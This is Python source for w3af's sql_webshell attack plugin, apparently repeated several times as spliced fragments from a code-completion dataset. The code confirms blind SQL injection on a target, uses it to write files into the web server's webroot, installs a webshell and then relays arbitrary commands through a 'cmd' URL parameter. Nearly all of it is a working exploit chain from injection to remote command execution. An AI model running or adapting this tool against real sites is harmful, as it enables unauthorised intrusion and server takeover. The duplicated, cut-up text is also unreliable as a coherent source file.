from plugins.attack.payloads.decorators.exec_decorator import exec_debug
# options
from core.data.options.option import option
from core.data.options.optionList import optionList
import urllib
class sql_webshell(baseAttackPlugin):
'''
Exploits [blind] sql injections by uploading a webshell to the target webroot.
'''
def __init__(self):
baseAttackPlugin.__init__(self)
# Internal variables
self._vuln = None
self._driver = None
# User configured options for fastExploit
self._url = ''
self._method = 'GET'
self._data = ''
self._injvar = ''
# User configured variables
self._equalLimit = 0.9
self._equAlgorithm = 'setIntersection'
self._goodSamaritan = True
self._generateOnlyOne = True
def fastExploit( self ):
'''
Exploits a web app with [blind] sql injections vulns.
The options are configured using the plugin options and setOptions() method.
'''
om.out.debug( 'Starting sql_webshell fastExploit.' )
if self._url is None or self._method is None or self._data is None or self._injvar is None:
raise w3afException('You have to configure the plugin parameters')
else:
freq = None
if self._method == 'POST':
freq = httpPostDataRequest.httpPostDataRequest()
elif self._method == 'GET':
freq = httpQsRequest.httpQsRequest()
else:
raise w3afException('Method not supported.')
freq.setURL( self._url )
freq.setDc( parse_qs( self._data ) )
freq.setHeaders( {} )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
vuln_obj = bsql.is_injectable( freq, self._injvar )
if not vuln_obj:
raise w3afException('Could not verify SQL injection ' + str(vuln) )
else:
om.out.console('SQL injection could be verified, trying to create the DB driver.')
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj is not None:
kb.kb.append( self, 'shell', shell_obj )
return [shell_obj, ]
raise w3afException('No exploitable vulnerabilities found.')
def getAttackType(self):
'''
@return: The type of exploit, SHELL, PROXY, etc.
'''
return 'shell'
def getExploitableVulns(self):
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
return vulns
def canExploit( self, vulnToExploit=None ):
'''
Searches the kb for vulnerabilities that the plugin can exploit.
@return: True if plugin knows how to exploit a found vuln.
'''
vulns = self.getExploitableVulns()
if vulnToExploit is not None:
vulns = [ v for v in vulns if v.getId() == vulnToExploit ]
if len(vulns) != 0:
return True
else:
om.out.console( 'No [blind] SQL injection vulnerabilities have been found.' )
om.out.console( 'Hint #1: Try to find vulnerabilities using the audit plugins.' )
msg = 'Hint #2: Use the set command to enter the values yourself, and then exploit it using fastExploit.'
om.out.console( msg )
return False
def exploit( self, vulnToExploit=None ):
'''
Exploits a [blind] sql injections vulns that was found and stored in the kb.
@return: True if the shell is working and the user can start calling specific_user_input
'''
if not self.canExploit():
return []
else:
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
tmp_vuln_list = []
for v in vulns:
# Filter the vuln that was selected by the user
if vulnToExploit is not None:
if vulnToExploit != v.getId():
continue
mutant = v.getMutant()
mutant.setModValue( mutant.getOriginalValue() )
v.setMutant( mutant )
# The user didn't selected anything, or we are in the selected vuln!
om.out.debug('Verifying vulnerability in URL: "' + v.getURL() + '".')
vuln_obj = bsql.is_injectable( v.getMutant().getFuzzableReq(), v.getVar() )
if vuln_obj:
tmp_vuln_list.append( vuln_obj )
# Ok, go to the next stage with the filtered vulnerabilities
vulns = tmp_vuln_list
if len(vulns) == 0:
om.out.debug('is_injectable failed for all vulnerabilities.')
return []
else:
for vuln_obj in vulns:
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj:
if self._generateOnlyOne:
# A shell was generated, I only need one point of exec.
return [shell_obj, ]
else:
# Keep adding all shells to the kb
pass
return kb.kb.getData( self.getName(), 'shell' )
def _generateShell( self, vuln_obj ):
'''
@parameter vuln_obj: The vuln to exploit, as it was saved in the kb or supplied by the user with set commands.
@return: A sql_webshell shell object if sql_webshell could fingerprint the database.
'''
bsql = blind_sqli_response_diff()
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
dbBuilder = dbDriverBuilder( self._urlOpener, bsql.equal )
driver = dbBuilder.getDriverForVuln( vuln_obj )
if driver is None:
return None
else:
# We have a driver, now, using this driver, we have to create the webshell in the
# target's webroot!
webshell_url = self._upload_webshell( driver, vuln_obj )
if webshell_url:
# Define the corresponding cut...
response = self._urlOpener.GET( webshell_url )
self._define_exact_cut( response.getBody(), shell_handler.SHELL_IDENTIFIER )
# Create the shell object
# Set shell parameters
shell_obj = sql_web_shell( vuln_obj )
shell_obj.setUrlOpener( self._urlOpener )
shell_obj.setWebShellURL( webshell_url )
shell_obj.set_cut( self._header_length, self._footer_length )
kb.kb.append( self, 'shell', shell_obj )
return shell_obj
else:
# Sad face :(
return None
def _upload_webshell(self, driver, vuln_obj):
'''
First, upload any file to the target webroot.
Once I've found the target webroot (or any other location inside the webroot where I can
write a file) try to upload a webshell and test for execution.
@parameter driver: The database driver to use in order to upload the file.
@parameter vuln_obj: The vulnerability that we are exploiting.
@return: The webshell URL if the webshell was uploaded, or None if the process failed.
'''
upload_success = False
# First, we test if we can upload a file into a directory we can access:
webroot_dirs = get_webroot_dirs( vuln_obj.getURL().getDomain() )
for webroot in webroot_dirs:
if upload_success: break
# w3af found a lot of directories, and we are going to use that knowledgeBase
# because one of the dirs may be writable and one may not!
for path in self._get_site_directories():
# Create the remote_path
remote_path = webroot + '/' + path
# Create the filename
remote_filename = createRandAlNum( 8 ) + '.' + createRandAlNum(3)
remote_path += '/' + remote_filename
# And just in case... remove double slashes
for i in xrange(3): remote_path = remote_path.replace('//', '/')
# Create the content (which will also act as the test_string)
test_string = content = createRandAlNum(16)
# Create the test URL
test_url = vuln_obj.getURL().urlJoin( path + '/' + remote_filename )
if self._upload_file( driver, remote_path, content, test_url, test_string):
upload_success = True
om.out.console('Successfully wrote a file to the webroot.')
break
# We can upload files, and we know where they are uploaded, now we
# just need to upload a webshell that works in that environment!
if upload_success:
om.out.console('Trying to write a webshell.')
# Get the extension from the vulnerable script
extension = vuln_obj.getURL().getExtension()
for file_content, real_extension in shell_handler.get_webshells( extension ):
# Create the variables to upload the file, based on the success of the
# previous for loop:
remote_path = remote_path[:remote_path.rfind('/')]
filename = createRandAlNum( 8 )
remote_path += '/' + filename + '.' + real_extension
# And now do "the same thing" with the URL
test_url = test_url[:test_url.rfind('/')]
test_url += '/' + filename + '.' + real_extension + '?cmd='
# Upload & test
if self._upload_file( driver, remote_path, file_content, test_url, shell_handler.SHELL_IDENTIFIER):
# Complete success!
om.out.console('Successfully installed a webshell in the target server!')
return test_url
return None
def _upload_file(self, driver, remote_path, content, test_url, test_string):
'''
Uploads a file to the target server, to the remote_path using the given SQL driver.
The content of the file is "content", and check if it was successfully uploaded using a
GET request to test_url and searching for the test_string string.
@return: True if the file was uploaded.
'''
msg = 'Writing "' + content + '" to "' + remote_path +'" and searching it at: "'
msg += test_url +'".'
om.out.debug( msg )
try:
driver.writeFile( remote_path , content )
response = self._urlOpener.GET( test_url )
except Exception, e:
om.out.error('Exception raised while uploading file: "' + str(e) + '".')
return False
else:
if test_string in response.getBody():
return True
else:
|
def _get_site_directories(self):
'''
@return: A list of the website directories.
'''
url_list = kb.kb.getData('urls','urlList')
url_list = [ i.getPathWithoutFile() for i in url_list ]
url_list = list(set(url_list))
return url_list
def getOptions( self ):
'''
@return: A list of option objects for this plugin.
'''
d1 = 'URL to exploit with fastExploit()'
o1 = option('url', self._url, d1, 'string')
d2 = 'Method to use with fastExploit()'
o2 = option('method', self._method, d2, 'string')
d3 = 'Data to send with fastExploit()'
o3 = option('data', self._data, d3, 'string')
d4 = 'Variable where to inject with fastExploit()'
o4 = option('injvar', self._injvar, d4, 'string')
d5 = 'The algorithm to use in the comparison of true and false response for blind sql.'
h5 = 'The options are: "stringEq" and "setIntersection". Read the user documentation for'
h5 += ' details.'
o5 = option('equAlgorithm', self._equAlgorithm, d5, 'string', help=h5)
d6 = 'Set the equal limit variable'
h6 = 'Two pages are equal if they match in more than equalLimit. Only used when'
h6 += ' equAlgorithm is set to setIntersection.'
o6 = option('equalLimit', self._equalLimit, d6, 'float', help=h6)
d7 = 'Enable or disable the good samaritan module'
h7 = 'The good samaritan module is a the best way to speed up blind sql exploitations.'
h7 += ' It\'s really simple, you see messages in the console that show the status of the'
h7 += ' discovery and you can help the discovery. For example, if you see "Micros" you'
h7 += ' could type "oft", and if it\'s correct, you have made your good action of the day'
h7 += ', speeded up the discovery AND had fun doing it.'
o7 = option('goodSamaritan', self._goodSamaritan, d7, 'boolean', help=h7)
d8 = 'If true, this plugin will try to generate only one shell object.'
o8 = option('generateOnlyOne', self._generateOnlyOne, d8, 'boolean')
ol = optionList()
ol.add(o1)
ol.add(o2)
ol.add(o3)
ol.add(o4)
ol.add(o5)
ol.add(o6)
ol.add(o7)
ol.add(o8)
return ol
def setOptions( self, optionsMap ):
'''
This method sets all the options that are configured using the user interface
generated by the framework using the result of getOptions().
@parameter optionsMap: A map with the options for the plugin.
@return: No value is returned.
'''
self._url = url_object( optionsMap['url'].getValue() ).uri2url()
if optionsMap['method'].getValue() not in ['GET', 'POST']:
raise w3afException('Unknown method.')
else:
self._method = optionsMap['method'].getValue()
self._data = optionsMap['data'].getValue()
self._injvar = optionsMap['injvar'].getValue()
self._equAlgorithm = optionsMap['equAlgorithm'].getValue()
self._equalLimit = optionsMap['equalLimit'].getValue()
self._goodSamaritan = optionsMap['goodSamaritan'].getValue()
self._generateOnlyOne = optionsMap['generateOnlyOne'].getValue()
def getPluginDeps( self ):
'''
@return: A list with the names of the plugins that should be runned before the
current one.
'''
return []
def getRootProbability( self ):
'''
@return: This method returns the probability of getting a root shell using this attack plugin.
This is used by the "exploit *" function to order the plugins and first try to exploit the more critical ones.
This method should return 0 for an exploit that will never return a root shell, and 1 for an exploit that WILL ALWAYS
return a root shell.
'''
return 0.1
def getLongDesc( self ):
'''
@return: A DETAILED description of the plugin functions and features.
'''
return '''
This plugin exploits [blind] sql injections.
The original sql_webshell program was coded by Bernardo Damele and Daniele Bellucci, many thanks to both of
them.
Seven configurable parameters exist:
- url
- method
- data
- injvar
- equAlgorithm
- equalLimit
'''
class sql_web_shell(shell):
def setWebShellURL( self, eu ):
self._webshell_url = eu
def getWebShellURL( self ):
return self._webshell_url
@exec_debug
def execute( self, command ):
'''
This method is called when a user writes a command in the shell and hits enter.
Before calling this method, the framework calls the generic_user_input method
from the shell class.
@parameter command: The command to handle ( ie. "read", "exec", etc ).
@return: The result of the command.
'''
to_send = self.getWebShellURL() + urllib.quote_plus( command )
response = self._urlOpener.GET( to_send )
return self._cut(response.getBody())
def end( self ):
om.out.debug('sql_web_shell cleanup complete.')
def getName( self ):
return 'sql_web_shell'
| return False | conditional_block |
sql_webshell.py | '''
sql_webshell.py
Copyright 2006 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
import core.controllers.outputManager as om
import core.data.request.httpPostDataRequest as httpPostDataRequest
import core.data.request.httpQsRequest as httpQsRequest
from core.controllers.basePlugin.baseAttackPlugin import baseAttackPlugin
from core.data.parsers.urlParser import parse_qs, url_object
from core.controllers.w3afException import w3afException
from plugins.attack.db.dbDriverBuilder import dbDriverBuilder as dbDriverBuilder
from core.controllers.sql_tools.blind_sqli_response_diff import blind_sqli_response_diff
from core.controllers.misc.webroot import get_webroot_dirs
from core.data.fuzzer.fuzzer import createRandAlNum
import core.data.kb.knowledgeBase as kb
import core.data.kb.vuln as vuln
from core.data.kb.shell import shell as shell
import plugins.attack.payloads.shell_handler as shell_handler
from plugins.attack.payloads.decorators.exec_decorator import exec_debug
# options
from core.data.options.option import option
from core.data.options.optionList import optionList
import urllib
class sql_webshell(baseAttackPlugin):
'''
Exploits [blind] sql injections by uploading a webshell to the target webroot.
'''
def __init__(self):
baseAttackPlugin.__init__(self)
# Internal variables
self._vuln = None
self._driver = None
# User configured options for fastExploit
self._url = ''
self._method = 'GET'
self._data = ''
self._injvar = ''
# User configured variables
self._equalLimit = 0.9
self._equAlgorithm = 'setIntersection'
self._goodSamaritan = True
self._generateOnlyOne = True
def fastExploit( self ):
'''
Exploits a web app with [blind] sql injections vulns.
The options are configured using the plugin options and setOptions() method.
'''
om.out.debug( 'Starting sql_webshell fastExploit.' )
if self._url is None or self._method is None or self._data is None or self._injvar is None:
raise w3afException('You have to configure the plugin parameters')
else:
freq = None
if self._method == 'POST':
freq = httpPostDataRequest.httpPostDataRequest()
elif self._method == 'GET':
freq = httpQsRequest.httpQsRequest()
else:
raise w3afException('Method not supported.')
freq.setURL( self._url )
freq.setDc( parse_qs( self._data ) )
freq.setHeaders( {} )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
vuln_obj = bsql.is_injectable( freq, self._injvar )
if not vuln_obj:
raise w3afException('Could not verify SQL injection ' + str(vuln) )
else:
om.out.console('SQL injection could be verified, trying to create the DB driver.')
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj is not None:
kb.kb.append( self, 'shell', shell_obj )
return [shell_obj, ]
raise w3afException('No exploitable vulnerabilities found.')
def getAttackType(self):
'''
@return: The type of exploit, SHELL, PROXY, etc.
'''
return 'shell'
def getExploitableVulns(self):
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
return vulns
def canExploit( self, vulnToExploit=None ):
'''
Searches the kb for vulnerabilities that the plugin can exploit.
@return: True if plugin knows how to exploit a found vuln.
'''
vulns = self.getExploitableVulns()
if vulnToExploit is not None:
vulns = [ v for v in vulns if v.getId() == vulnToExploit ]
if len(vulns) != 0:
return True
else:
om.out.console( 'No [blind] SQL injection vulnerabilities have been found.' )
om.out.console( 'Hint #1: Try to find vulnerabilities using the audit plugins.' )
msg = 'Hint #2: Use the set command to enter the values yourself, and then exploit it using fastExploit.'
om.out.console( msg )
return False
def exploit( self, vulnToExploit=None ):
'''
Exploits a [blind] sql injections vulns that was found and stored in the kb.
@return: True if the shell is working and the user can start calling specific_user_input
'''
if not self.canExploit():
return []
else:
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
tmp_vuln_list = []
for v in vulns:
# Filter the vuln that was selected by the user
if vulnToExploit is not None:
if vulnToExploit != v.getId():
continue
mutant = v.getMutant()
mutant.setModValue( mutant.getOriginalValue() )
v.setMutant( mutant )
# The user didn't selected anything, or we are in the selected vuln!
om.out.debug('Verifying vulnerability in URL: "' + v.getURL() + '".')
vuln_obj = bsql.is_injectable( v.getMutant().getFuzzableReq(), v.getVar() )
if vuln_obj:
tmp_vuln_list.append( vuln_obj )
# Ok, go to the next stage with the filtered vulnerabilities
vulns = tmp_vuln_list
if len(vulns) == 0:
om.out.debug('is_injectable failed for all vulnerabilities.')
return []
else:
for vuln_obj in vulns:
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj:
if self._generateOnlyOne:
# A shell was generated, I only need one point of exec.
return [shell_obj, ]
else:
# Keep adding all shells to the kb
pass
return kb.kb.getData( self.getName(), 'shell' )
def _generateShell( self, vuln_obj ):
'''
@parameter vuln_obj: The vuln to exploit, as it was saved in the kb or supplied by the user with set commands.
@return: A sql_webshell shell object if sql_webshell could fingerprint the database.
'''
bsql = blind_sqli_response_diff()
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
dbBuilder = dbDriverBuilder( self._urlOpener, bsql.equal )
driver = dbBuilder.getDriverForVuln( vuln_obj )
if driver is None:
return None
else:
# We have a driver, now, using this driver, we have to create the webshell in the
# target's webroot!
webshell_url = self._upload_webshell( driver, vuln_obj )
if webshell_url:
# Define the corresponding cut...
response = self._urlOpener.GET( webshell_url )
self._define_exact_cut( response.getBody(), shell_handler.SHELL_IDENTIFIER )
# Create the shell object
# Set shell parameters
shell_obj = sql_web_shell( vuln_obj )
shell_obj.setUrlOpener( self._urlOpener )
shell_obj.setWebShellURL( webshell_url )
shell_obj.set_cut( self._header_length, self._footer_length )
kb.kb.append( self, 'shell', shell_obj )
return shell_obj
else:
# Sad face :(
return None
def | (self, driver, vuln_obj):
'''
First, upload any file to the target webroot.
Once I've found the target webroot (or any other location inside the webroot where I can
write a file) try to upload a webshell and test for execution.
@parameter driver: The database driver to use in order to upload the file.
@parameter vuln_obj: The vulnerability that we are exploiting.
@return: The webshell URL if the webshell was uploaded, or None if the process failed.
'''
upload_success = False
# First, we test if we can upload a file into a directory we can access:
webroot_dirs = get_webroot_dirs( vuln_obj.getURL().getDomain() )
for webroot in webroot_dirs:
if upload_success: break
# w3af found a lot of directories, and we are going to use that knowledgeBase
# because one of the dirs may be writable and one may not!
for path in self._get_site_directories():
# Create the remote_path
remote_path = webroot + '/' + path
# Create the filename
remote_filename = createRandAlNum( 8 ) + '.' + createRandAlNum(3)
remote_path += '/' + remote_filename
# And just in case... remove double slashes
for i in xrange(3): remote_path = remote_path.replace('//', '/')
# Create the content (which will also act as the test_string)
test_string = content = createRandAlNum(16)
# Create the test URL
test_url = vuln_obj.getURL().urlJoin( path + '/' + remote_filename )
if self._upload_file( driver, remote_path, content, test_url, test_string):
upload_success = True
om.out.console('Successfully wrote a file to the webroot.')
break
# We can upload files, and we know where they are uploaded, now we
# just need to upload a webshell that works in that environment!
if upload_success:
om.out.console('Trying to write a webshell.')
# Get the extension from the vulnerable script
extension = vuln_obj.getURL().getExtension()
for file_content, real_extension in shell_handler.get_webshells( extension ):
# Create the variables to upload the file, based on the success of the
# previous for loop:
remote_path = remote_path[:remote_path.rfind('/')]
filename = createRandAlNum( 8 )
remote_path += '/' + filename + '.' + real_extension
# And now do "the same thing" with the URL
test_url = test_url[:test_url.rfind('/')]
test_url += '/' + filename + '.' + real_extension + '?cmd='
# Upload & test
if self._upload_file( driver, remote_path, file_content, test_url, shell_handler.SHELL_IDENTIFIER):
# Complete success!
om.out.console('Successfully installed a webshell in the target server!')
return test_url
return None
def _upload_file(self, driver, remote_path, content, test_url, test_string):
'''
Uploads a file to the target server, to the remote_path using the given SQL driver.
The content of the file is "content", and check if it was successfully uploaded using a
GET request to test_url and searching for the test_string string.
@return: True if the file was uploaded.
'''
msg = 'Writing "' + content + '" to "' + remote_path +'" and searching it at: "'
msg += test_url +'".'
om.out.debug( msg )
try:
driver.writeFile( remote_path , content )
response = self._urlOpener.GET( test_url )
except Exception, e:
om.out.error('Exception raised while uploading file: "' + str(e) + '".')
return False
else:
if test_string in response.getBody():
return True
else:
return False
def _get_site_directories(self):
'''
@return: A list of the website directories.
'''
url_list = kb.kb.getData('urls','urlList')
url_list = [ i.getPathWithoutFile() for i in url_list ]
url_list = list(set(url_list))
return url_list
def getOptions( self ):
'''
@return: A list of option objects for this plugin.
'''
d1 = 'URL to exploit with fastExploit()'
o1 = option('url', self._url, d1, 'string')
d2 = 'Method to use with fastExploit()'
o2 = option('method', self._method, d2, 'string')
d3 = 'Data to send with fastExploit()'
o3 = option('data', self._data, d3, 'string')
d4 = 'Variable where to inject with fastExploit()'
o4 = option('injvar', self._injvar, d4, 'string')
d5 = 'The algorithm to use in the comparison of true and false response for blind sql.'
h5 = 'The options are: "stringEq" and "setIntersection". Read the user documentation for'
h5 += ' details.'
o5 = option('equAlgorithm', self._equAlgorithm, d5, 'string', help=h5)
d6 = 'Set the equal limit variable'
h6 = 'Two pages are equal if they match in more than equalLimit. Only used when'
h6 += ' equAlgorithm is set to setIntersection.'
o6 = option('equalLimit', self._equalLimit, d6, 'float', help=h6)
d7 = 'Enable or disable the good samaritan module'
h7 = 'The good samaritan module is a the best way to speed up blind sql exploitations.'
h7 += ' It\'s really simple, you see messages in the console that show the status of the'
h7 += ' discovery and you can help the discovery. For example, if you see "Micros" you'
h7 += ' could type "oft", and if it\'s correct, you have made your good action of the day'
h7 += ', speeded up the discovery AND had fun doing it.'
o7 = option('goodSamaritan', self._goodSamaritan, d7, 'boolean', help=h7)
d8 = 'If true, this plugin will try to generate only one shell object.'
o8 = option('generateOnlyOne', self._generateOnlyOne, d8, 'boolean')
ol = optionList()
ol.add(o1)
ol.add(o2)
ol.add(o3)
ol.add(o4)
ol.add(o5)
ol.add(o6)
ol.add(o7)
ol.add(o8)
return ol
def setOptions( self, optionsMap ):
'''
This method sets all the options that are configured using the user interface
generated by the framework using the result of getOptions().
@parameter optionsMap: A map with the options for the plugin.
@return: No value is returned.
'''
self._url = url_object( optionsMap['url'].getValue() ).uri2url()
if optionsMap['method'].getValue() not in ['GET', 'POST']:
raise w3afException('Unknown method.')
else:
self._method = optionsMap['method'].getValue()
self._data = optionsMap['data'].getValue()
self._injvar = optionsMap['injvar'].getValue()
self._equAlgorithm = optionsMap['equAlgorithm'].getValue()
self._equalLimit = optionsMap['equalLimit'].getValue()
self._goodSamaritan = optionsMap['goodSamaritan'].getValue()
self._generateOnlyOne = optionsMap['generateOnlyOne'].getValue()
def getPluginDeps( self ):
'''
@return: A list with the names of the plugins that should be runned before the
current one.
'''
return []
def getRootProbability( self ):
'''
@return: This method returns the probability of getting a root shell using this attack plugin.
This is used by the "exploit *" function to order the plugins and first try to exploit the more critical ones.
This method should return 0 for an exploit that will never return a root shell, and 1 for an exploit that WILL ALWAYS
return a root shell.
'''
return 0.1
def getLongDesc( self ):
'''
@return: A DETAILED description of the plugin functions and features.
'''
return '''
This plugin exploits [blind] sql injections.
The original sql_webshell program was coded by Bernardo Damele and Daniele Bellucci, many thanks to both of
them.
Seven configurable parameters exist:
- url
- method
- data
- injvar
- equAlgorithm
- equalLimit
'''
class sql_web_shell(shell):
def setWebShellURL( self, eu ):
self._webshell_url = eu
def getWebShellURL( self ):
return self._webshell_url
@exec_debug
def execute( self, command ):
'''
This method is called when a user writes a command in the shell and hits enter.
Before calling this method, the framework calls the generic_user_input method
from the shell class.
@parameter command: The command to handle ( ie. "read", "exec", etc ).
@return: The result of the command.
'''
to_send = self.getWebShellURL() + urllib.quote_plus( command )
response = self._urlOpener.GET( to_send )
return self._cut(response.getBody())
def end( self ):
om.out.debug('sql_web_shell cleanup complete.')
def getName( self ):
return 'sql_web_shell'
| _upload_webshell | identifier_name |
sql_webshell.py | '''
sql_webshell.py
Copyright 2006 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
import core.controllers.outputManager as om
import core.data.request.httpPostDataRequest as httpPostDataRequest
import core.data.request.httpQsRequest as httpQsRequest
from core.controllers.basePlugin.baseAttackPlugin import baseAttackPlugin
from core.data.parsers.urlParser import parse_qs, url_object
from core.controllers.w3afException import w3afException
from plugins.attack.db.dbDriverBuilder import dbDriverBuilder as dbDriverBuilder
from core.controllers.sql_tools.blind_sqli_response_diff import blind_sqli_response_diff
from core.controllers.misc.webroot import get_webroot_dirs
from core.data.fuzzer.fuzzer import createRandAlNum
import core.data.kb.knowledgeBase as kb
import core.data.kb.vuln as vuln
from core.data.kb.shell import shell as shell
import plugins.attack.payloads.shell_handler as shell_handler
from plugins.attack.payloads.decorators.exec_decorator import exec_debug
# options
from core.data.options.option import option
from core.data.options.optionList import optionList
import urllib
class sql_webshell(baseAttackPlugin):
'''
Exploits [blind] sql injections by uploading a webshell to the target webroot.
'''
def __init__(self):
baseAttackPlugin.__init__(self)
# Internal variables
self._vuln = None
self._driver = None
# User configured options for fastExploit
self._url = ''
self._method = 'GET'
self._data = ''
self._injvar = ''
# User configured variables
self._equalLimit = 0.9
self._equAlgorithm = 'setIntersection'
self._goodSamaritan = True
self._generateOnlyOne = True
def fastExploit( self ):
'''
Exploits a web app with [blind] sql injections vulns.
The options are configured using the plugin options and setOptions() method.
'''
om.out.debug( 'Starting sql_webshell fastExploit.' )
if self._url is None or self._method is None or self._data is None or self._injvar is None:
raise w3afException('You have to configure the plugin parameters')
else:
freq = None
if self._method == 'POST':
freq = httpPostDataRequest.httpPostDataRequest()
elif self._method == 'GET':
freq = httpQsRequest.httpQsRequest()
else:
raise w3afException('Method not supported.')
freq.setURL( self._url )
freq.setDc( parse_qs( self._data ) )
freq.setHeaders( {} )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
vuln_obj = bsql.is_injectable( freq, self._injvar )
if not vuln_obj:
raise w3afException('Could not verify SQL injection ' + str(vuln) )
else:
om.out.console('SQL injection could be verified, trying to create the DB driver.')
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj is not None:
kb.kb.append( self, 'shell', shell_obj )
return [shell_obj, ]
raise w3afException('No exploitable vulnerabilities found.')
def getAttackType(self):
'''
@return: The type of exploit, SHELL, PROXY, etc.
'''
return 'shell'
def getExploitableVulns(self):
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
return vulns
def canExploit( self, vulnToExploit=None ):
'''
Searches the kb for vulnerabilities that the plugin can exploit.
@return: True if plugin knows how to exploit a found vuln.
'''
vulns = self.getExploitableVulns()
if vulnToExploit is not None:
vulns = [ v for v in vulns if v.getId() == vulnToExploit ]
if len(vulns) != 0:
return True
else:
om.out.console( 'No [blind] SQL injection vulnerabilities have been found.' )
om.out.console( 'Hint #1: Try to find vulnerabilities using the audit plugins.' )
msg = 'Hint #2: Use the set command to enter the values yourself, and then exploit it using fastExploit.'
om.out.console( msg )
return False
def exploit( self, vulnToExploit=None ):
'''
Exploits a [blind] sql injections vulns that was found and stored in the kb.
@return: True if the shell is working and the user can start calling specific_user_input
'''
if not self.canExploit():
return []
else:
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
tmp_vuln_list = []
for v in vulns:
# Filter the vuln that was selected by the user
if vulnToExploit is not None:
if vulnToExploit != v.getId():
continue
mutant = v.getMutant()
mutant.setModValue( mutant.getOriginalValue() )
v.setMutant( mutant )
# The user didn't selected anything, or we are in the selected vuln!
om.out.debug('Verifying vulnerability in URL: "' + v.getURL() + '".')
vuln_obj = bsql.is_injectable( v.getMutant().getFuzzableReq(), v.getVar() )
if vuln_obj:
tmp_vuln_list.append( vuln_obj )
# Ok, go to the next stage with the filtered vulnerabilities
vulns = tmp_vuln_list
if len(vulns) == 0:
om.out.debug('is_injectable failed for all vulnerabilities.')
return []
else:
for vuln_obj in vulns:
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj:
if self._generateOnlyOne:
# A shell was generated, I only need one point of exec.
return [shell_obj, ]
else:
# Keep adding all shells to the kb
pass
return kb.kb.getData( self.getName(), 'shell' )
def _generateShell( self, vuln_obj ):
'''
@parameter vuln_obj: The vuln to exploit, as it was saved in the kb or supplied by the user with set commands.
@return: A sql_webshell shell object if sql_webshell could fingerprint the database.
'''
bsql = blind_sqli_response_diff()
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
dbBuilder = dbDriverBuilder( self._urlOpener, bsql.equal )
driver = dbBuilder.getDriverForVuln( vuln_obj )
if driver is None:
return None
else:
# We have a driver, now, using this driver, we have to create the webshell in the
# target's webroot!
webshell_url = self._upload_webshell( driver, vuln_obj )
if webshell_url:
# Define the corresponding cut...
response = self._urlOpener.GET( webshell_url )
self._define_exact_cut( response.getBody(), shell_handler.SHELL_IDENTIFIER )
# Create the shell object
# Set shell parameters
shell_obj = sql_web_shell( vuln_obj )
shell_obj.setUrlOpener( self._urlOpener )
shell_obj.setWebShellURL( webshell_url )
shell_obj.set_cut( self._header_length, self._footer_length )
